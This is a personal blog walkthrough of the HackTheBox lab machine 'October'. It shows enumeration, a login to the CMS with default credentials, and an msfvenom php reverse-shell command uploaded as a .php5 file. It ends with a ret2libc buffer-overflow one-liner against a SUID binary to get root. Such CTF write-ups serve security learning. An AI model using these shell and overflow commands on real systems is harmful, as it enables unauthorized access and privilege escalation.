HackTheBox / InfoSec / CTF

HackTheBox | October Walkthrough

. 6 min read . Written by Nautilus
HackTheBox | October Walkthrough

October is a machine on HackTheBox which is rated as "medium" difficulty. October has an easy foothold, but a challenging privilege escalation. This machine was a huge learning process for me and I had to reference some write-ups in the process. However, I got there eventually.

Getting a Shell and User.txt

To begin this machine let's do our initial nmap scan:

nmap -sC -sV
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info

After browsing to the web page we are presented with the following:

There's nothing too interesting going on here so let's try using dirb:

dirb /usr/share/wordlists/dirb/small.txt

Looks like we've found some interesting directories. Let's checkout /backend first since that looks to be the most interesting:

Looks like we've found an administrator panel. Let's look up the default credentials to the administrator panel:

I probably should've guessed that.. Oh well. Time to try logging in with the default credentials:

It worked! Before going any further let's use searchsploit to search for any known vulnerabilities of October:

Great! Let's look at the first which is "CMS 1.0.412 - Multiple Vulnerabilities". We might find something that might help us:

The first PoC looks like it's going to work for us. All we have to do is create a shell ending in an "alternative extension" like .php5. Let's quickly use msfvenom to generate our shell to upload:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=31337 -f raw > oops.php5

Great! Now let's set up a listener in metasploit:

Now we just have to find somewhere to upload the shell:

That easy easy enough. Now let's upload our oops.php5 shell:

That worked perfectly. Let's click the public url and see if it pops our shell:

After a little navigation we find user.txt in /home/harry/ and can read, and submit the flag:

Privilege Escalation and Root.txt

Now that we have a shell on the system we're going to want to enumerate and find out our route to privilege escalation. We could use LinEnum.sh, but I decided to simplify the process by exploring SUID binaries:

The binary that stands out to us immediately is /usr/local/bin/overflw. Let's download overflw and see what's going on with it:

Plot twist.. I couldn't. I was experiencing a lot of problems in my meterpreter shell (not sure if it was my system, meterpreter, or the machine) so I decided to switch over to just a regular php shell and receive it via netcat:

After much trouble I was able to download ovrflw from the system, rename it overflow and then file it:

Now let's try to run the file:

So from what we've gathered so far. We're going to be performing a buffer overflow (hinted at by the name of the file, ovrflw). If we input any string the message "<input string>" completely disappears:

We're going to need to use gdb to get a better look at what's going on otherwise we'll be sitting here forever. Let's open up our file in gdb:

Let's dump some code for the main function:

Let's create a pattern of 100 now and pass it in as the argument:

Alright.. Nothing happened. Let's try doubling that to 200 and running:

Awesome. Let's search for a pattern now:

We can quickly identify our offset as 112:

I got pretty stuck here.. Buffer overflows are not something I'm completely familiar with so I referenced a few already written walkthroughs which will be referenced below. Turns out I was on the right path, I just needed to look a little deeper.

First off, I needed to determine whether or not ASLR was enabled:

I can't really explain the next part too well so I'm going to link some references I used, and the command used to achieve root on the system:



while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "\x10\x53\x5e\xb7\x60\x82\x5d\xb7\xac\x7b\x70\xb7"');done

It's a goal of mine to better understand overflows and this machine provided an amazing opportunity. Not only did I learn more about overflows, but nearly exploited one all by myself. I definitely find that my strengths are more in web app testing, but am enjoying small transitions such as this.

Anyways, let's run the command on the machine and see if we can get root:

After gaining root we can browse to /root/, read, and submit the root.txt flag:

Final Thoughts

I think that retired boxes being available with in-depth write-ups is an amazing opportunity to learn. I'm sure I would've gotten there eventually - but was able to learn so much about overflows in the process. Once I do more research and practice more I plan to come back to this box and exploit the overflow entirely by myself.

Thanks for reading, and learning with me.